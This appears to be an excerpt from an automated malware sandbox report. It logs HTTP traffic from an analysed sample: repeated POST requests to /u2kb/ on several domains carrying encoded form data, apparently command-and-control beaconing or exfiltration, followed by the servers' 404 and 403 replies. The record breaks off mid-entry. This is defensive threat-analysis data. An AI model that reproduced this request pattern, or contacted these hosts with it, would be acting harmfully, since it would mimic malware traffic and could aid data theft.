          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.energyservicestation.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.energyservicestation.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.energyservicestation.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 46 49 52 64 59 4b 38 32 4c 68 41 7a 31 6a 42 33 4d 78 4e 54 5a 6f 4c 64 69 36 69 51 50 5a 64 42 37 56 4f 57 36 76 53 4f 54 32 4c 61 66 36 66 4f 31 72 61 75 7e 68 75 74 79 65 6a 42 31 62 6f 6c 75 31 59 42 73 6e 75 4c 70 4c 6b 45 76 38 46 47 58 5a 79 74 41 6e 46 72 76 55 34 70 51 42 6e 46 56 52 68 76 52 55 43 4c 59 6d 6f 52 45 39 50 41 28 7a 37 32 68 6f 61 6e 42 61 74 51 43 34 59 39 71 5f 30 32 76 54 6a 6a 4e 41 4b 46 55 37 73 48 62 36 70 36 4c 4a 65 5a 28 51 66 4f 71 5a 31 74 42 47 68 31 55 6f 28 31 75 51 71 64 6e 74 64 44 6a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=FIRdYK82LhAz1jB3MxNTZoLdi6iQPZdB7VOW6vSOT2Laf6fO1rau~hutyejB1bolu1YBsnuLpLkEv8FGXZytAnFrvU4pQBnFVRhvRUCLYmoRE9PA(z72hoanBatQC4Y9q_02vTjjNAKFU7sHb6p6LJeZ(QfOqZ1tBGh1Uo(1uQqdntdDjQ).
          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.younrock.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.younrock.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.younrock.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 35 37 46 76 7a 66 53 6e 68 6b 4f 5f 28 4b 75 55 4d 55 59 6c 38 30 64 6c 58 73 45 77 53 69 63 55 38 56 68 69 33 71 5a 63 59 6d 44 72 4b 2d 45 35 4e 69 31 42 50 53 55 68 6c 46 68 74 36 6e 36 6e 57 64 50 4f 30 70 66 69 38 57 42 56 37 50 37 6d 61 4c 76 76 35 32 6a 39 43 31 6e 6f 49 62 36 4b 35 67 64 36 73 69 33 30 52 70 32 30 30 6f 71 58 58 74 53 6d 7e 64 34 48 50 35 69 45 72 39 46 46 6f 33 67 67 4b 70 75 79 48 6b 33 46 41 70 73 7a 62 4b 66 67 62 41 75 47 52 54 4e 32 71 37 50 4d 75 68 76 47 51 43 32 54 39 6e 64 67 52 71 76 48 56 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=57FvzfSnhkO_(KuUMUYl80dlXsEwSicU8Vhi3qZcYmDrK-E5Ni1BPSUhlFht6n6nWdPO0pfi8WBV7P7maLvv52j9C1noIb6K5gd6si30Rp200oqXXtSm~d4HP5iEr9FFo3ggKpuyHk3FApszbKfgbAuGRTN2q7PMuhvGQC2T9ndgRqvHVA).
          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.thewildphotographer.co.ukConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.thewildphotographer.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thewildphotographer.co.uk/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 6b 6c 57 54 5a 69 48 63 31 4e 71 36 63 67 6a 71 31 4a 64 38 5a 52 4e 35 62 61 48 6c 79 46 44 35 30 69 7a 48 34 69 51 70 67 6e 64 39 74 4f 45 70 52 4e 64 78 51 36 65 46 70 74 66 47 30 45 66 4c 64 42 67 50 4b 55 51 57 68 56 6d 47 56 48 4a 41 57 68 65 50 37 75 4f 75 64 47 28 71 55 6a 43 4f 63 39 75 74 62 6d 51 7a 64 63 34 34 30 62 32 37 32 75 65 6a 56 66 43 6b 6d 61 51 45 32 66 75 55 28 58 53 79 77 79 76 78 44 77 52 31 63 2d 67 53 69 70 57 50 58 79 4d 4f 7e 58 67 34 51 4b 48 7a 4d 43 6a 48 54 45 73 54 28 64 72 31 5a 4b 39 4b 55 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=klWTZiHc1Nq6cgjq1Jd8ZRN5baHlyFD50izH4iQpgnd9tOEpRNdxQ6eFptfG0EfLdBgPKUQWhVmGVHJAWheP7uOudG(qUjCOc9utbmQzdc440b272uejVfCkmaQE2fuU(XSywyvxDwR1c-gSipWPXyMO~Xg4QKHzMCjHTEsT(dr1ZK9KUA).
          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.shapshit.xyzConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.shapshit.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.shapshit.xyz/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 56 66 52 78 77 52 51 41 62 39 68 53 34 69 67 43 61 62 55 4f 74 73 43 58 33 33 37 34 75 70 74 46 36 39 4a 35 4d 6c 6f 58 38 52 7e 61 54 43 34 79 43 55 59 6d 74 76 4f 59 54 30 43 77 77 6b 57 62 67 30 4e 56 77 59 62 34 7e 47 46 35 64 4f 36 41 56 59 74 5a 39 32 6b 78 63 42 54 62 54 50 69 76 48 63 4d 59 6b 54 72 72 78 4c 56 52 43 47 31 78 6a 77 73 31 76 30 6c 34 6d 5a 38 61 36 64 48 79 45 43 58 4a 4f 58 4a 77 4c 4a 53 48 63 44 34 34 75 70 72 76 4b 6d 79 73 73 36 28 50 45 48 45 72 59 6c 47 45 39 74 32 6e 67 58 30 58 4e 2d 50 33 52 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=VfRxwRQAb9hS4igCabUOtsCX3374uptF69J5MloX8R~aTC4yCUYmtvOYT0CwwkWbg0NVwYb4~GF5dO6AVYtZ92kxcBTbTPivHcMYkTrrxLVRCG1xjws1v0l4mZ8a6dHyECXJOXJwLJSHcD44uprvKmyss6(PEHErYlGE9t2ngX0XN-P3RA).
          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.thedivinerudraksha.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.thedivinerudraksha.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thedivinerudraksha.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 76 6b 52 79 55 54 39 48 56 37 31 4b 53 39 69 70 58 76 6c 62 5a 2d 54 52 6a 2d 42 6f 6b 59 51 73 52 45 6b 54 6f 4b 39 64 75 5a 43 34 65 75 6b 6a 35 6a 76 55 30 52 32 72 47 74 7e 63 4f 39 70 54 28 75 4a 6c 4f 4d 47 50 6d 6e 75 76 6d 70 62 69 65 73 38 32 31 49 63 74 65 59 51 61 48 5a 57 45 65 4b 70 71 69 6d 38 45 48 68 4b 41 62 7a 64 2d 31 61 32 6d 50 56 73 46 53 57 56 71 31 73 30 72 35 4e 63 38 39 75 50 59 77 6d 71 4b 38 34 73 48 4b 63 46 38 53 75 31 48 6a 77 4f 66 4a 4d 31 36 35 6a 66 6e 44 57 4e 61 70 55 61 62 7e 31 69 66 7e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=vkRyUT9HV71KS9ipXvlbZ-TRj-BokYQsREkToK9duZC4eukj5jvU0R2rGt~cO9pT(uJlOMGPmnuvmpbies821IcteYQaHZWEeKpqim8EHhKAbzd-1a2mPVsFSWVq1s0r5Nc89uPYwmqK84sHKcF8Su1HjwOfJM165jfnDWNapUab~1if~g).
          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.un-object.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.un-object.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.un-object.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 6b 54 72 45 4b 70 64 4c 49 67 35 6e 53 45 58 46 49 30 51 31 34 50 31 6a 65 47 51 39 7e 4c 69 66 52 76 67 68 61 35 32 79 77 6d 7e 62 4b 43 4f 38 32 69 72 55 51 78 72 36 28 5f 41 6e 31 32 58 39 54 56 38 71 61 54 45 52 49 35 71 74 31 7a 70 73 46 43 64 51 6a 6c 50 57 4d 47 4c 38 68 67 53 5f 36 30 6e 43 66 37 44 31 67 38 61 70 38 64 73 70 28 4e 73 43 32 4a 4b 65 65 53 56 73 76 6c 51 5a 79 6c 66 2d 64 5a 6f 34 57 4a 4d 72 76 69 63 30 64 70 42 7a 77 38 47 73 57 43 76 63 46 74 41 4e 50 37 79 51 6c 71 30 39 69 4d 65 6b 66 6b 4a 6d 50 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=kTrEKpdLIg5nSEXFI0Q14P1jeGQ9~LifRvgha52ywm~bKCO82irUQxr6(_An12X9TV8qaTERI5qt1zpsFCdQjlPWMGL8hgS_60nCf7D1g8ap8dsp(NsC2JKeeSVsvlQZylf-dZo4WJMrvic0dpBzw8GsWCvcFtANP7yQlq09iMekfkJmPA).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 20 Mar 2023 16:51:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzzJaC0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 20 Mar 2023 16:51:13 GMTContent-Type: text/htmlContent-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 16:51:18 GMTContent-Type: text/htmlContent-Length: 199Connection: closeAccept-Ranges: bytesVary: Accept-Encoding,User-AgentContent-Encoding: gzipData Raw: 1f 8b 08 00 00 00 00 00 00 03 e5 8e c1 0e 82 30 10 44 ef fd 8a d5 bb 5d 34 1e 9b 26 4a 4b 6c 82 60 4c 39 70 14 a8 81 a8 10 69 91 df b7 d5 8b ff e0 de 66 f6 ed cc b2 85 c8 63 5d 9e 24 1c f4 31 85 53 b1 4f 55 0c cb 15 a2 92 3a 41 14 5a 7c 37 1b 1a 21 ca 6c c9 09 0b 9a b3 83 dc 09 2f b4 d2 a9 e4 db 68 0b d9 e0 20 19 a6 be 61 f8 35 09 c3 0f c4 f6 b9 28 c3 dd 9a ff 30 5e 11 dd 1a 18 cd 73 32 d6 99 06 8a 73 0a 38 6d 6e 15 c2 7c b1 d0 7b f6 1a 58 18 7a 70 6d 67 c1 9a f1 65 46 ea 93 ce 3e 4e f1 79 9e 69 d5 b9 60 77 b5 b1 77 d7 d0 7a 78 30 54 a1 fa 53 ea 6b c2 b3 e4 9f e7 0d 15 d1 11 fb e3 01 00 00 Data Ascii: 0D]4&JKl`L9pifc]$1SOU:AZ|7!l/h a5(0^s2s8mn|{XzpmgeF>Nyi`wwzx0TSk
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 16:51:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccept-Ranges: bytesVary: Accept-Encoding,User-AgentData Raw: 32 36 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 32 6b 62 2f 3f 58 35 31 51 6a 6d 3d 72 72 2b 73 4f 42 76 45 58 73 42 64 47 65 76 55 6b 5a 45 41 76 6e 69 47 57 72 4e 78 7a 43 31 59 4e 48 6d 58 69 76 72 39 32 46 51 68 52 49 49 59 73 65 64 52 68 4c 2b 59 47 61 4e 32 56 43 69 65 47 74 6a 74 4c 54 55 54 7a 55 71 78 44 58 33 57 66 37 57 6f 76 66 4d 52 4d 39 63 65 43 75 54 6d 33 51 3d 3d 26 61 6d 70 3b 77 36 44 4e 5f 3d 45 30 45 51 53 4d 30 52 43 62 33 34 39 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 49 3e 77 77 77 2e 62 69 74 73 65 72 76 69 63 65 73 6c 74 64 2e 63 6f 6d 3c 2f 49 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0d 0a Data Ascii: 268<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /u2kb/?X51Qjm=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7WovfMRM9ceCuTm3Q==&amp;w6DN_=E0EQSM0RCb349p was not found on this server.<HR><I>www.bitservicesltd.com</I></BODY></HTML>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Mon, 20 Mar 2023 16:51:26 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:51:34 GMTServer: Apache/2.4.54 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 64 37 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 70 61 72 6b 69 6e 67 2f 73 74 79 6c 65 73 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 65 6e 65 72 67 79 73 65 72 76 69 63 65 73 74 61 74 69 6f 6e 2e 63 6f 6d 20 72 65 67 69 73 74 65 72 65 64 20 61 74 20 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 5f 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 70 61 72 6b 69 6e 67 2f 69 6d 67 2f 61 6c 6c 64 6f 6d 61 69 6e 73 5f 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 3c 68 31 3e 54 68 65 20 64 6f 6d 61 69 6e 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 65 6e 65 72 67 79 73 65 72 76 69 63 65 73 74 61 74 69 6f 6e 2e 63 6f 6d 3c 2f 73 70 61 6e 3e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 61 20 63 75 73 74 6f 6d 65 72 2e 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 42 65 63 6f 6d 65 20 61 20 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 20 63 75 73 74 6f 6d 65 72 20 61 6e 64 20 62 65 6e 65 66 69 74 20 66 72 6f 6d 20 74 68 65 20 6e 75 6d 65 72 6f 75 73 20 61 64 76 61 6e 74 61 67 65 73 21 3c 62 72 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:51:36 GMTServer: Apache/2.4.54 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 64 38 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 70 61 72 6b 69 6e 67 2f 73 74 79 6c 65 73 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 65 6e 65 72 67 79 73 65 72 76 69 63 65 73 74 61 74 69 6f 6e 2e 63 6f 6d 20 72 65 67 69 73 74 65 72 65 64 20 61 74 20 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 5f 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 70 61 72 6b 69 6e 67 2f 69 6d 67 2f 61 6c 6c 64 6f 6d 61 69 6e 73 5f 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 3c 68 31 3e 54 68 65 20 64 6f 6d 61 69 6e 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 65 6e 65 72 67 79 73 65 72 76 69 63 65 73 74 61 74 69 6f 6e 2e 63 6f 6d 3c 2f 73 70 61 6e 3e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 61 20 63 75 73 74 6f 6d 65 72 2e 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 42 65 63 6f 6d 65 20 61 20 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 20 63 75 73 74 6f 6d 65 72 20 61 6e 64 20 62 65 6e 65 66 69 74 20 66 72 6f 6d 20 74 68 65 20 6e 75 6d 65 72 6f 75 73 20 61 64 76 61 6e 74 61 67 65 73 21 3c 62 72 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: openresty/1.13.6.1date: Mon, 20 Mar 2023 16:51:52 GMTcontent-type: text/htmlcontent-length: 175connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:51:58 GMTServer: ApacheContent-Length: 4406Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 